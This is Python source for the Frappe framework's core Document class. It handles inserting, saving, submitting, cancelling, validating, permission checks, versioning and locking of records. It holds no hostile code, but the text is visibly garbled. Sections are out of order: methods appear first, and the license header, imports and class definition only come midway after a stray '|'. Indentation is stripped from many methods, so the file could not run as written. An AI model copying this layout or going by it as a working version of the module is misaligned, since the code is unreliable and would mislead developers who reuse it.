	# see _submit: unwrap the staticmethod to use it as a decorator here
	@whitelist.__func__
	def _cancel(self):
		"""Cancel the document. Sets `docstatus` = 2, then saves."""
		self.docstatus = 2
		self.save()
	@whitelist.__func__
	def submit(self):
		"""Submit the document. Sets `docstatus` = 1, then saves.

		Thin public wrapper over `_submit`; `queue_action` prefers the
		underscored variant when running in the background."""
		self._submit()
	@whitelist.__func__
	def cancel(self):
		"""Cancel the document. Sets `docstatus` = 2, then saves.

		Thin public wrapper over `_cancel`; `queue_action` prefers the
		underscored variant when running in the background."""
		self._cancel()
	def delete(self, ignore_permissions=False):
		"""Delete this document via `frappe.delete_doc`.

		:param ignore_permissions: passed through to `frappe.delete_doc`."""
		frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
	def run_before_save_methods(self):
		"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:

		- `validate`, `before_save` for **Save**.
		- `validate`, `before_submit` for **Submit**.
		- `before_cancel` for **Cancel**
		- `before_update_after_submit` for **Update after Submit**

		Will also update title_field if set"""
		# snapshot the stored copy (for versioning/diff) and reset _seen first
		self.load_doc_before_save()
		self.reset_seen()
		# before_validate method should be executed before ignoring validations
		if self._action in ("save", "submit"):
			self.run_method("before_validate")
		# callers may skip the whole validate/before_* cycle via this flag
		if self.flags.ignore_validate:
			return
		if self._action=="save":
			self.run_method("validate")
			self.run_method("before_save")
		elif self._action=="submit":
			self.run_method("validate")
			self.run_method("before_submit")
		elif self._action=="cancel":
			self.run_method("before_cancel")
		elif self._action=="update_after_submit":
			self.run_method("before_update_after_submit")
		self.set_title_field()
	def load_doc_before_save(self):
		"""Load the currently stored version of this document into
		`self._doc_before_save` (None for new documents), for later diffing."""
		self._doc_before_save = None
		if not self.is_new():
			try:
				self._doc_before_save = frappe.get_doc(self.doctype, self.name)
			except frappe.DoesNotExistError:
				# record is gone from the database; treat like a fresh save
				self._doc_before_save = None
				frappe.clear_last_message()
def run_post_save_methods(self):
"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:
- `on_update` for **Save**.
- `on_update`, `on_submit` for **Submit**.
- `on_cancel` for **Cancel**
- `update_after_submit` for **Update after Submit**"""
doc_before_save = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
	def clear_cache(self):
		"""Invalidate the cached copy of this document."""
		frappe.clear_document_cache(self.doctype, self.name)
	def reset_seen(self):
		"""Clear _seen property and set current user as seen"""
		if getattr(self.meta, 'track_seen', False):
			# metadata only: do not bump the modified timestamp
			frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
	def notify_update(self):
		"""Publish realtime that the current document is modified"""
		if frappe.flags.in_patch: return
		frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
			doctype=self.doctype, docname=self.name, after_commit=True)
		# list views are refreshed only for regular doctypes (not read-only,
		# single or child-table doctypes)
		if not self.meta.get("read_only") and not self.meta.get("issingle") and \
			not self.meta.get("istable"):
			data = {
				"doctype": self.doctype,
				"name": self.name,
				"user": frappe.session.user
			}
			frappe.publish_realtime("list_update", data, after_commit=True)
	def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
		"""Set a value in the document object, update the timestamp and update the database.

		WARNING: This method does not trigger controller validations and should
		be used very carefully.

		:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
		:param value: value of the property to be updated
		:param update_modified: default True. updates the `modified` and `modified_by` properties
		:param notify: default False. run doc.notify_update() to send updates via socketio
		:param commit: default False. run frappe.db.commit()
		"""
		if isinstance(fieldname, dict):
			self.update(fieldname)
		else:
			self.set(fieldname, value)
		if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
			# don't update modified timestamp if called from post save methods
			# like on_update or on_submit
			self.set("modified", now())
			self.set("modified_by", frappe.session.user)
		self.load_doc_before_save()
		# to trigger notification on value change
		self.run_method('before_change')
		frappe.db.set_value(self.doctype, self.name, fieldname, value,
			self.modified, self.modified_by, update_modified=update_modified)
		self.run_method('on_change')
		if notify:
			self.notify_update()
		self.clear_cache()
		if commit:
			frappe.db.commit()
	def db_get(self, fieldname):
		"""Return the stored database value of `fieldname` for this document."""
		return frappe.db.get_value(self.doctype, self.name, fieldname)
	def check_no_back_links_exist(self):
		"""Check if document links to any active document before Cancel."""
		from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
		if not self.flags.ignore_links:
			# both static Link fields and Dynamic Link fields are checked
			check_if_doc_is_linked(self, method="Cancel")
			check_if_doc_is_dynamically_linked(self, method="Cancel")
	def save_version(self):
		"""Insert a Version document capturing the diff of this save."""
		# don't track version under following conditions
		if (not getattr(self.meta, 'track_changes', False)
			or self.doctype == 'Version'
			or self.flags.ignore_version
			or frappe.flags.in_install
			or (not self._doc_before_save and frappe.flags.in_patch)):
			return
		version = frappe.new_doc('Version')
		if not self._doc_before_save:
			# brand new document: record the insert itself
			version.for_insert(self)
			version.insert(ignore_permissions=True)
		elif version.set_diff(self._doc_before_save, self):
			# only insert a Version if something actually changed
			version.insert(ignore_permissions=True)
			if not frappe.flags.in_migrate:
				# follow since you made a change?
				follow_document(self.doctype, self.name, frappe.session.user)
	@staticmethod
	def hook(f):
		"""Decorator: Make method `hookable` (i.e. extensible by another app).

		Note: If each hooked method returns a value (dict), then all returns are
		collated in one dict and returned. Ideally, don't return values in hookable
		methods, set properties in the document."""
		def add_to_return_value(self, new_return_value):
			# merge dict returns into one dict; otherwise keep the last
			# non-empty return value
			if isinstance(new_return_value, dict):
				if not self.get("_return_value"):
					self._return_value = {}
				self._return_value.update(new_return_value)
			else:
				self._return_value = new_return_value or self.get("_return_value")

		def compose(fn, *hooks):
			# build a runner that calls the original fn, then each hook in order
			def runner(self, method, *args, **kwargs):
				add_to_return_value(self, fn(self, *args, **kwargs))
				for f in hooks:
					add_to_return_value(self, f(self, method, *args, **kwargs))

				return self._return_value

			return runner

		def composer(self, *args, **kwargs):
			hooks = []
			method = f.__name__
			doc_events = frappe.get_doc_hooks()
			# doctype-specific hooks first, then wildcard ("*") hooks
			for handler in doc_events.get(self.doctype, {}).get(method, []) \
				+ doc_events.get("*", {}).get(method, []):
				hooks.append(frappe.get_attr(handler))

			composed = compose(f, *hooks)
			return composed(self, method, *args, **kwargs)

		return composer
	def is_whitelisted(self, method):
		"""Raise NotFound if `method` does not exist on this document, or
		Forbidden if it exists but is not whitelisted for remote calls."""
		fn = getattr(self, method, None)
		if not fn:
			raise NotFound("Method {0} not found".format(method))
		elif not getattr(fn, "whitelisted", False):
			raise Forbidden("Method {0} not whitelisted".format(method))
	def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
		"""Check that value of fieldname should be 'condition' val2
		else throw Exception.

		:param fieldname: field to check on `doc` (default: self)
		:param condition: comparison operator understood by `frappe.compare`
			(e.g. "in", "not in", "^", "=", ...)
		:param val2: value to compare against (cast to the field's type)
		:param doc: document to read the value from; defaults to self
		:param raise_exception: exception class to raise on failure"""
		# human-readable names for the non-symbolic operators
		error_condition_map = {
			"in": _("one of"),
			"not in": _("none of"),
			"^": _("beginning with"),
		}
		if not doc:
			doc = self
		val1 = doc.get_value(fieldname)
		df = doc.meta.get_field(fieldname)
		val2 = doc.cast(val2, df)
		if not frappe.compare(val1, condition, val2):
			label = doc.meta.get_label(fieldname)
			condition_str = error_condition_map.get(condition, condition)
			if doc.parentfield:
				msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
			else:
				msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)
			# raise passed exception or True
			msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
"""Raise exception if Table field is empty."""
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.
:param doc: Document whose numeric properties are to be rounded.
:param fieldnames: [Optional] List of fields to be rounded."""
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
"""Add a comment to this document.
:param comment_type: e.g. `Comment`. See Communication for more info."""
out = frappe.get_doc({
"doctype":"Comment",
'comment_type': comment_type,
"comment_email": comment_email or frappe.session.user,
"comment_by": comment_by,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": text or comment_type,
"link_doctype": link_doctype,
"link_name": link_name
}).insert(ignore_permissions=True)
return out
def add_seen(self, user=None):
"""add the given/current user to list of users who have seen this document (_seen)"""
if not user:
user = frappe.session.user
if self.meta.track_seen:
_seen = self.get('_seen') or []
_seen = frappe.parse_json(_seen)
if user not in _seen:
_seen.append(user)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
frappe.local.flags.commit = True
def add_viewed(self, user=None):
"""add log to communication when a user views a document"""
if not user:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(ignore_permissions=True)
frappe.local.flags.commit = True
def get_signature(self):
"""Returns signature (hash) for private URL."""
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
liked_by = getattr(self, "_liked_by", None)
if liked_by:
return json.loads(liked_by)
else:
return []
def set_onload(self, key, value):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[key] = value
def get_onload(self, key=None):
if not key:
return self.get("__onload", frappe._dict())
return self.get('__onload')[key]
	def queue_action(self, action, **kwargs):
		"""Run an action in background. If the action has an inner function,
		like _submit for submit, it will call that instead.

		Raises a `Document Queued` message if a lock file for this document
		already exists; otherwise locks the document and enqueues
		`frappe.model.document.execute_action`."""
		# call _submit instead of submit, so you can override submit to call
		# run_delayed based on some action
		# See: Stock Reconciliation
		from frappe.utils.background_jobs import enqueue

		if hasattr(self, '_' + action):
			action = '_' + action

		if file_lock.lock_exists(self.get_signature()):
			frappe.throw(_('This document is currently queued for execution. Please try again'),
				title=_('Document Queued'))

		self.lock()
		enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
			action=action, **kwargs)
	def lock(self, timeout=None):
		"""Creates a lock file for the given document. If timeout is set,
		it will retry every 1 second for acquiring the lock again.

		:param timeout: seconds to keep retrying (one check per second)
			before raising `frappe.DocumentLockedError`; when falsy, an
			existing lock raises immediately."""
		signature = self.get_signature()
		if file_lock.lock_exists(signature):
			lock_exists = True
			if timeout:
				for i in range(timeout):
					time.sleep(1)
					if not file_lock.lock_exists(signature):
						lock_exists = False
						break
			if lock_exists:
				raise frappe.DocumentLockedError
		file_lock.create_lock(signature)
	def unlock(self):
		"""Delete the lock file for this document"""
		file_lock.delete_lock(self.get_signature())
# validation helpers
def validate_from_to_dates(self, from_date_field, to_date_field):
"""
Generic validation to verify date sequence
"""
if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(to_date_field)),
frappe.bold(self.meta.get_label(from_date_field)),
), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
assignments = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
users = set([assignment.owner for assignment in assignments])
return users
	def add_tag(self, tag):
		"""Add a Tag to this document.

		:param tag: tag label to attach (via `DocTags`)."""
		from frappe.desk.doctype.tag.tag import DocTags
		DocTags(self.doctype).add(self.name, tag)
	def get_tags(self):
		"""Return a list of Tags attached to this document"""
		from frappe.desk.doctype.tag.tag import DocTags
		# the first element of the split is dropped — presumably the stored
		# string has a leading separator; verify against DocTags storage
		return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
	"""Execute an action on a document (called by background worker).

	Unlocks the document first, runs the action, and on failure rolls back
	and records the error as a comment on the document. Always publishes a
	realtime update at the end."""
	doc = frappe.get_doc(doctype, name)
	doc.unlock()
	try:
		getattr(doc, action)(**kwargs)
	except Exception:
		frappe.db.rollback()

		# add a comment (?)
		if frappe.local.message_log:
			msg = json.loads(frappe.local.message_log[-1]).get('message')
		else:
			# fixed mis-nested closing tags (was '</pre></code>')
			msg = '<pre><code>' + frappe.get_traceback() + '</code></pre>'

		doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)

	doc.notify_update()
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint, is_whitelisted
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
	"""returns a frappe.model.Document object.

	:param arg1: Document dict or DocType name.
	:param arg2: [optional] document name.
	:param for_update: [optional] select document for update.

	There are multiple ways to call `get_doc`

		# will fetch the latest user object (with child table) from the database
		user = get_doc("User", "test@example.com")

		# create a new object
		user = get_doc({
			"doctype":"User"
			"email_id": "test@example.com",
			"roles: [
				{"role": "System Manager"}
			]
		})

		# create new object with keyword arguments
		user = get_doc(doctype='User', email_id='test@example.com')

		# select a document for update
		user = get_doc("User", "test@example.com", for_update=True)
	"""
	doctype = None

	if args:
		if isinstance(args[0], BaseDocument):
			# already a document
			return args[0]
		elif isinstance(args[0], string_types):
			doctype = args[0]
		elif isinstance(args[0], dict):
			# passed a dict
			kwargs = args[0]
		else:
			raise ValueError('First non keyword argument must be a string or dict')

	if len(args) < 2 and kwargs:
		if 'doctype' in kwargs:
			doctype = kwargs['doctype']
		else:
			raise ValueError('"doctype" is a required key')

	# previously, calling get_doc() with no usable arguments fell through to
	# get_controller() with `doctype` unbound and raised a confusing NameError
	if doctype is None:
		raise ValueError('"doctype" is a required key')

	controller = get_controller(doctype)
	if controller:
		return controller(*args, **kwargs)

	raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
	def __init__(self, *args, **kwargs):
		"""Constructor.

		:param arg1: DocType name as string or document **dict**
		:param arg2: Document name, if `arg1` is DocType name.

		If DocType name and document name are passed, the object will load
		all values (including child documents) from the database.
		"""
		self.doctype = self.name = None
		self._default_new_docs = {}
		self.flags = frappe._dict()

		if args and args[0] and isinstance(args[0], string_types):
			# first argument is doctype
			if len(args)==1:
				# single
				self.doctype = self.name = args[0]
			else:
				self.doctype = args[0]
				if isinstance(args[1], dict):
					# filter: resolve the name from the filters dict
					self.name = frappe.db.get_value(args[0], args[1], "name")
					if self.name is None:
						frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
							frappe.DoesNotExistError)
				else:
					self.name = args[1]

				if 'for_update' in kwargs:
					self.flags.for_update = kwargs.get('for_update')

			self.load_from_db()
			return

		if args and args[0] and isinstance(args[0], dict):
			# first argument is a dict
			kwargs = args[0]

		if kwargs:
			# init base document
			super(Document, self).__init__(kwargs)
			self.init_valid_columns()

		else:
			# incorrect arguments. let's not proceed.
			raise ValueError('Illegal arguments')
	@staticmethod
	def whitelist(fn):
		"""Decorator: Whitelist method to be called remotely via REST API."""
		frappe.whitelist()(fn)
		return fn
	def reload(self):
		"""Reload document from database"""
		self.load_from_db()
	def load_from_db(self):
		"""Load document and children from database and create properties
		from fields"""
		if not getattr(self, "_metaclass", False) and self.meta.issingle:
			# single doctypes live in tabSingles, not a dedicated table
			single_doc = frappe.db.get_singles_dict(self.doctype)
			if not single_doc:
				single_doc = frappe.new_doc(self.doctype).as_dict()
				single_doc["name"] = self.doctype
				del single_doc["__islocal"]

			super(Document, self).__init__(single_doc)
			self.init_valid_columns()
			self._fix_numeric_types()

		else:
			d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
			if not d:
				frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)

			super(Document, self).__init__(d)

		if self.name=="DocType" and self.doctype=="DocType":
			# bootstrap case: meta for DocType itself is hard-coded
			# (NOTE: this local deliberately shadows the module-level table_fields)
			from frappe.model.meta import DOCTYPE_TABLE_FIELDS
			table_fields = DOCTYPE_TABLE_FIELDS
		else:
			table_fields = self.meta.get_table_fields()

		for df in table_fields:
			children = frappe.db.get_values(df.options,
				{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
				"*", as_dict=True, order_by="idx asc")
			if children:
				self.set(df.fieldname, children)
			else:
				self.set(df.fieldname, [])

		# sometimes __setup__ can depend on child values, hence calling again at the end
		if hasattr(self, "__setup__"):
			self.__setup__()
def get_latest(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
	def check_permission(self, permtype='read', permlevel=None):
		"""Raise `frappe.PermissionError` if not permitted.

		:param permtype: permission type to check
		:param permlevel: used only in the error message, not in the check"""
		if not self.has_permission(permtype):
			self.raise_no_permission_to(permlevel or permtype)
	def has_permission(self, permtype="read", verbose=False):
		"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
		is not set.

		:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
		if self.flags.ignore_permissions:
			return True
		return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
	def raise_no_permission_to(self, perm_type):
		"""Raise `frappe.PermissionError`.

		:param perm_type: the failed permission type (note: not included in
			the error message, which reports only the doctype)."""
		frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
		raise frappe.PermissionError
	def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
			ignore_mandatory=None, set_name=None, set_child_names=True):
		"""Insert the document in the database (as a new document).

		This will check for user permissions and execute `before_insert`,
		`validate`, `on_update`, `after_insert` methods if they are written.

		:param ignore_permissions: Do not check permissions if True.
		:param ignore_links: Do not validate Link fields if True.
		:param ignore_if_duplicate: Swallow DuplicateEntryError if True.
		:param ignore_mandatory: Skip mandatory-field validation if True.
		:param set_name: Use this name instead of the autoname.
		:param set_child_names: Also name child rows (default True)."""
		if self.flags.in_print:
			return

		self.flags.notifications_executed = []

		if ignore_permissions!=None:
			self.flags.ignore_permissions = ignore_permissions

		if ignore_links!=None:
			self.flags.ignore_links = ignore_links

		if ignore_mandatory!=None:
			self.flags.ignore_mandatory = ignore_mandatory

		self.set("__islocal", True)

		self.check_permission("create")
		self._set_defaults()
		self.set_user_and_timestamp()
		self.set_docstatus()
		self.check_if_latest()
		self.run_method("before_insert")
		self._validate_links()
		self.set_new_name(set_name=set_name, set_child_names=set_child_names)
		self.set_parent_in_children()
		self.validate_higher_perm_levels()

		self.flags.in_insert = True
		self.run_before_save_methods()
		self._validate()
		self.set_docstatus()
		self.flags.in_insert = False

		# run validate, on update etc.

		# parent
		if getattr(self.meta, "issingle", 0):
			self.update_single(self.get_valid_dict())
		else:
			try:
				self.db_insert()
			except frappe.DuplicateEntryError as e:
				if not ignore_if_duplicate:
					raise e

		# children
		for d in self.get_all_children():
			d.db_insert()

		self.run_method("after_insert")
		self.flags.in_insert = True

		if self.get("amended_from"):
			self.copy_attachments_from_amended_from()

		# flag to prevent creation of event update log for create and update both
		# during document creation
		self.flags.update_log_for_doc_creation = True

		self.run_post_save_methods()
		self.flags.in_insert = False

		# delete __islocal
		if hasattr(self, "__islocal"):
			delattr(self, "__islocal")

		# clear unsaved flag
		if hasattr(self, "__unsaved"):
			delattr(self, "__unsaved")

		if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
			follow_document(self.doctype, self.name, frappe.session.user)
		return self
	def save(self, *args, **kwargs):
		"""Wrapper for _save"""
		return self._save(*args, **kwargs)
	def _save(self, ignore_permissions=None, ignore_version=None):
		"""Save the current document in the database in the **DocType**'s table or
		`tabSingles` (for single types).

		This will check for user permissions and execute
		`validate` before updating, `on_update` after updating triggers.

		:param ignore_permissions: Do not check permissions if True.
		:param ignore_version: Do not save version if True."""
		if self.flags.in_print:
			return

		self.flags.notifications_executed = []

		if ignore_permissions!=None:
			self.flags.ignore_permissions = ignore_permissions

		# versions are skipped by default in tests unless explicitly requested
		self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version

		if self.get("__islocal") or not self.get("name"):
			# unsaved document: route to insert() instead
			self.insert()
			return

		self.check_permission("write", "save")

		self.set_user_and_timestamp()
		self.set_docstatus()
		self.check_if_latest()
		self.set_parent_in_children()
		self.set_name_in_children()

		self.validate_higher_perm_levels()
		self._validate_links()
		self.run_before_save_methods()

		if self._action != "cancel":
			self._validate()

		if self._action == "update_after_submit":
			self.validate_update_after_submit()

		self.set_docstatus()

		# parent
		if self.meta.issingle:
			self.update_single(self.get_valid_dict())
		else:
			self.db_update()

		self.update_children()
		self.run_post_save_methods()

		# clear unsaved flag
		if hasattr(self, "__unsaved"):
			delattr(self, "__unsaved")

		return self
def copy_attachments_from_amended_from(self):
"""Copy attachments from `amended_from`"""
from frappe.desk.form.load import get_attachments
#loop through attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
#save attachments to new doc
_file = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
_file.save()
def update_children(self):
"""update child tables"""
for df in self.meta.get_table_fields():
self.update_child_table(df.fieldname, df)
	def update_child_table(self, fieldname, df=None):
		"""Sync the child table for `fieldname`: update rows present in the
		document and delete database rows that were removed from it.

		:param fieldname: the table field to sync
		:param df: its docfield, looked up from meta when not given"""
		rows = []

		if not df:
			df = self.meta.get_field(fieldname)

		for d in self.get(df.fieldname):
			d.db_update()
			rows.append(d.name)

		if df.options in (self.flags.ignore_children_type or []):
			# do not delete rows for this because of flags
			# hack for docperm :(
			return

		if rows:
			# select rows that do not match the ones in the document
			deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
				and parenttype=%s and parentfield=%s
				and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
				[self.name, self.doctype, fieldname] + rows)

			if len(deleted_rows) > 0:
				# delete rows that do not match the ones in the document
				frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
					','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))

		else:
			# no rows found, delete all rows
			frappe.db.sql("""delete from `tab{0}` where parent=%s
				and parenttype=%s and parentfield=%s""".format(df.options),
				(self.name, self.doctype, fieldname))
	def get_doc_before_save(self):
		"""Return the document state captured before this save (or None)."""
		return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
'''Returns true if value is changed before and after saving'''
previous = self.get_doc_before_save()
return previous.get(fieldname)!=self.get(fieldname) if previous else True
	def set_new_name(self, force=False, set_name=None, set_child_names=True):
		"""Calls `frappe.naming.set_new_name` for parent and child docs.

		:param force: re-run naming even if `flags.name_set` is already set
		:param set_name: use this explicit name instead of autoname
		:param set_child_names: also name all child rows (default True)"""
		if self.flags.name_set and not force:
			return

		# If autoname has set as Prompt (name)
		if self.get("__newname"):
			self.name = self.get("__newname")
			self.flags.name_set = True
			return

		if set_name:
			self.name = set_name
		else:
			set_new_name(self)

		if set_child_names:
			# set name for children
			for d in self.get_all_children():
				set_new_name(d)

		self.flags.name_set = True
	def get_title(self):
		"""Get the document title based on title_field or `title` or `name`"""
		return self.get(self.meta.get_title_field())
	def set_title_field(self):
		"""Set title field based on template"""
		def get_values():
			values = self.as_dict()
			# format values: str.format cannot handle None, so blank them out
			for key, value in iteritems(values):
				if value==None:
					values[key] = ""
			return values

		if self.meta.get("title_field")=="title":
			df = self.meta.get_field(self.meta.title_field)

			if df.options:
				# options holds a format template, e.g. "{customer} - {date}"
				self.set(df.fieldname, df.options.format(**get_values()))
			elif self.is_new() and not self.get(df.fieldname) and df.default:
				# set default title for new transactions (if default)
				self.set(df.fieldname, df.default.format(**get_values()))
	def update_single(self, d):
		"""Updates values for Single type Document in `tabSingles`.

		:param d: dict of field -> value to store (one row per field)."""
		# singles are stored as (doctype, field, value) rows: wipe and rewrite
		frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
		for field, value in iteritems(d):
			if field != "doctype":
				frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
					values (%s, %s, %s)""", (self.doctype, field, value))

		if self.doctype in frappe.db.value_cache:
			del frappe.db.value_cache[self.doctype]
	def set_user_and_timestamp(self):
		"""Stamp modified/creation/owner on this document and all children,
		and register the document as currently being saved."""
		# keep the old timestamp for the concurrency check in check_if_latest
		self._original_modified = self.modified
		self.modified = now()
		self.modified_by = frappe.session.user
		if not self.creation:
			self.creation = self.modified
		if not self.owner:
			self.owner = self.modified_by

		for d in self.get_all_children():
			d.modified = self.modified
			d.modified_by = self.modified_by
			if not d.owner:
				d.owner = self.owner
			if not d.creation:
				d.creation = self.creation

		frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
def _validate(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
children = self.get_all_children()
for d in children:
d._validate_data_fields()
d._validate_selects()
d._validate_non_negative()
d._validate_length()
d._extract_images_from_text_editor()
d._sanitize_content()
d._save_passwords()
if self.is_new():
# don't set fields like _assign, _comments for new doc
for fieldname in optional_fields:
self.set(fieldname, None)
else:
self.validate_set_only_once()
def _validate_non_negative(self):
def get_msg(df):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))
for df in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(df.fieldname)) < 0:
msg = get_msg(df)
frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
def validate_workflow(self):
"""Validate if the workflow transition is valid"""
if frappe.flags.in_install == 'frappe': return
workflow = self.meta.get_workflow()
if workflow:
validate_workflow(self)
if not self._action == 'save':
set_workflow_state_on_action(self, workflow, self._action)
def validate_set_only_once(self):
"""Validate that fields are not changed if not in insert"""
set_only_once_fields = self.meta.get_set_only_once_fields()
if set_only_once_fields and self._doc_before_save:
# document exists before saving
for field in set_only_once_fields:
fail = False
value = self.get(field.fieldname)
original_value = self._doc_before_save.get(field.fieldname)
if field.fieldtype in table_fields:
fail = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
fail = str(value) != str(original_value)
else:
fail = value != original_value
if fail:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
